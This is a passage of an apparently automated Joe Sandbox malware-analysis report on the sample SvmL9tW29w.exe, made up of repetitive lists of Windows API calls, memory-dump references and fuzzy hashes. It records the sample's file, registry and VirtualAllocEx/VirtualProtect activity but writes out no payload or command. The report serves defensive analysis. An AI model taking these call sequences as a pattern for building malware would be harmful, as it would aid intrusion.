                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                              • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                              • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                              • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,00402EE1,C:\Users\user\Desktop\SvmL9tW29w.exe,80000000,?), ref: 00405C94
                                                              • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                              • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                              • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                              • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                              APIs
                                                              • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,?,?,?), ref: 00405767
                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00405775
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                              • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                              • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                              • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(00000000), ref: 742F2AF7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3778973022.00000000742F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 742F0000, based on PE: true
                                                              • Associated: 00000000.00000002.3778066901.00000000742F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3778991125.00000000742F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3779007150.00000000742F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_742f0000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 6faea900981b394f9bb171da630ea35bcc4711a8b39f4d9df21ae87d344c4e8d
                                                              • Instruction ID: b72e94cd2531ae8599eba581c58ac7e58d61378f85833c96ff354dbd9337413d
                                                              • Opcode Fuzzy Hash: 6faea900981b394f9bb171da630ea35bcc4711a8b39f4d9df21ae87d344c4e8d
                                                              • Instruction Fuzzy Hash: 7341E033654205EFEB148FAAEC84F98B774EB96324FF04429DC01C7251C63A96B09BB4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: wsprintf
                                                              • String ID:
                                                              • API String ID: 2111968516-0
                                                              • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                              • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                              • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                              • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                              APIs
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FileMove
                                                              • String ID:
                                                              • API String ID: 3562171763-0
                                                              • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                              • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                              • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                              • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                                • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FilePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 327478801-0
                                                              • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                              • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                              • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                              • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                              APIs
                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                              • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                              • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                              • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                              APIs
                                                              • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: PathSearch
                                                              • String ID:
                                                              • API String ID: 2203818243-0
                                                              • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                              • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                              • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                              • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                              APIs
                                                              • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                              • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                              • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                              • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,?,00000000,00000000,00000000), ref: 00405D1C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                              • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                              • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                              • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                              APIs
                                                              • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,?,00000000), ref: 00405D4B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                              • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                              • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(742F404C,?,?,742F403C), ref: 742F293F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3778973022.00000000742F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 742F0000, based on PE: true
                                                              • Associated: 00000000.00000002.3778066901.00000000742F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3778991125.00000000742F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3779007150.00000000742F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_742f0000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 3d7f080f9c90e470f993db2af8d6da0bd67df507512a43cc703a94980d45b141
                                                              • Instruction ID: 9b9a643dc1f241faa729258089117355093e8779d94997bfd1998af80b05dadc
                                                              • Opcode Fuzzy Hash: 3d7f080f9c90e470f993db2af8d6da0bd67df507512a43cc703a94980d45b141
                                                              • Instruction Fuzzy Hash: 57F098B37A8240EFC358CF6E8948F857FE0E325368BE1452EED58D7252E3B44164AB15
                                                              APIs
                                                              • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID:
                                                              • API String ID: 1096422788-0
                                                              • Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                              • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                              • Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                              • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,?,Call), ref: 00405FA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                              • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                              • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                              • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                              APIs
                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                              • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
